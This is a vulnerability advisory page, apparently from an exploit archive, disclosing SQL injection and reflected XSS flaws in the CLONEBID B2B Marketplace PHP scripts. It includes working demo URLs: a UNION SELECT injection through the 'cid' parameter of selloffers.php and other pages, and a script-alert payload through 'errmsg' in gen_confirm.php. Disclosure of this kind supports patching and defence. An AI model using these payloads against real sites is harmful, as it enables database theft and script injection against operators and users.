header-logo
Suggest Exploit
vendor:
CLONEBID B2B Marketplace
by:
Hamza 'MizoZ' N.
8,8
CVSS
HIGH
SQL Injection & XSS
89 (SQL Injection) & 79 (XSS)
CWE
Product Name: CLONEBID B2B Marketplace
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

SQL Injection & XSS in CLONEBID B2B Marketplace

SQL Injection vulnerability exists in the 'selloffers.php' file, when the 'cid' parameter is supplied with malicious SQL code. XSS vulnerability exists in the 'gen_confirm.php' file, when the 'errmsg' parameter is supplied with malicious JavaScript code.

Mitigation:

Input validation and sanitization should be implemented to prevent malicious code from being executed.
Source

Exploit-DB raw data:

/*

Name : CLONEBID B2B Marketplace
Vendor : http://www.clonebid.com

Author : Hamza 'MizoZ' N.
Email : mizozx[at]gmail[dot]com

Greetz : Zuka !

*/

# SQL Injection :

File : selloffers.php , Get : cid

[HOST]/[PATH]/selloffers.php?cid=[INJECTION]

Demo : http://server/selloffers.php?cid=-14+union+select+1,version%28%29,3,4,5,6,7,8--

!!! : Same vuln => profiles.php & buyoffers.php

# XSS :

[HOST]/[PATH]/gen_confirm.php?errmsg=[SCRIPT :)]

Demo : http://server/gen_confirm.php?errmsg=%3Cscript%3Ealert%281337%29;%3C/script%3E